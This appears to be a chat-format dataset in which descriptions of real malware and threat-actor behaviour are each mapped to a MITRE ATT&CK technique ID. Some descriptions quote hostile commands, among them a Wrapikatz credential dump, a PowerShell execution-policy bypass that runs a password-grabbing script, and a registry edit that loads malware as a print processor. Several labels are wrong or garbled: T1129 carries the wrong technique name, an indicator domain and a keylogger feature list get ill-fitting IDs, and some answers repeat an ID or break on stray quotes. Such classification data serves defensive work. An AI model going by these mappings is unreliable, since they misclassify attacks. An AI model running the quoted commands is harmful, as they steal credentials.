- "role": "user",
- "content": "SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG : Hello ,my name is , Im ready my Computer Name is: All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with “AS_” or “AF_”"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Derusbi is capable of obtaining directory, file, and drive listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Initial access via a phishing email that linked to a google docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DownPaper uses the command line."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar gathers information about network adapters."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad uses a DGA that is based on the day of the month for C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APIs and strings in some variants are RC4 encrypted. Another variant is encoded with XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has used base64 to encode its C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has relied upon users to execute a malicious attachment delivered via spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer can gather the victim's username to send to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs"
- },
- {
- "role": "assistant",
- "content": "T1053.002 - Scheduled Task/Job: At"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key has sent its public key to the C2 server over TCP."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to communicate over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has decrypted a binary blob to start execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory"
- },
- {
- "role": "assistant",
- "content": "T1564 - Hide Artifacts', 'T1564 - Hide Artifacts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to enumerate the infected system's user name via \"GetUserNameW\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth has used a scheduled task for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can collect data from the system, and can monitor changes in specified directories."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy stores itself in \"~/Library/.DS_Stores/\""
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy attempts to collect passwords from browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used AdFind to enumerate domain groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use Dropbox and GitHub for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one incident, the threat actor used the Wrapikatz tool (w.exe) with a usage statement that retrieves various passwords and Windows credentials from memory and compiles them in w.txt: c:\\programdata\\w.exe –w –l –c>>c:\\programdata\\w.txt In a separate incident, the threat actor used access provided by extensive web shell deployment to harvest account credentials: 2016-10-03T09:27:47 dir 2016-10-03T09:28:11 w64.log >ppp.log 2016-10-03T09:30:10 PowerShell.exe -ExecutionPolicy Bypass -File getpwd.ps1 >iistail.log In another example, BRONZE UNION leveraged the Kekeo credential abuse tool to exploit CVE-2014-6324, a vulnerability in Microsoft's implementation of the Kerberos network authentication protocol"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has added the Registry key `HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Print Processors\\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor."
- },
- {
- "role": "assistant",
- "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke is capable of uploading and downloading files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence: Creates a Windows RUN registry key for persistence. The name of the key is: \"Dropbox Update Setup\". This name was consistent in all the samples. This key points to the location of the Python-compiled binary in the %appdata% directory to ensure that it is started automatically each time the system is rebooted"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor also collects some rudimentary information about the compromised computer including some basic network adapter information, system version information, and language settings"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy is capable of taking screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has attempted to hide its payload by using legitimate file names such as \"iconcache.db\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses AES to encrypt network communication."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a variant of NanoCore RAT that communicates with its C2 server over port 6666."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk overwrites the first sector of the Master Boot Record with “0x00”."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has encrypted payloads and strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may use net view /domain to display hostnames of available systems on a network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a scheduled task for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Responder captures hashes and credentials that are sent to the system after the name services have been poisoned."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs process discovery using \"tasklist\" commands."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has used \"regsvr32.exe\" to launch malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command to open a file manager and explorer on the system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT can use Regsvr32 to execute malicious DLLs"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been delivered within ZIP or RAR password-protected archived files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects a DLL for into the explorer.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack can use Windows API's \"ConnectNamedPipe\" and \"WNetAddConnection2\" to detect incoming connections and connect to remote shares."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver deletes the original dropped file from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Log keystrokes and the titles of open windows - Gather clipboard data and system information - Steal printer information and any documents that were sent to be printed - Record audio - Capture screenshots and webcam photos"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each user on a Mac can have a LaunchAgents folder in their own Library folder to specify code that should be run every time that user logs in. We can confirm this is the case with Green Lambert by running the implant, then checking the user’s LaunchAgents folder"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
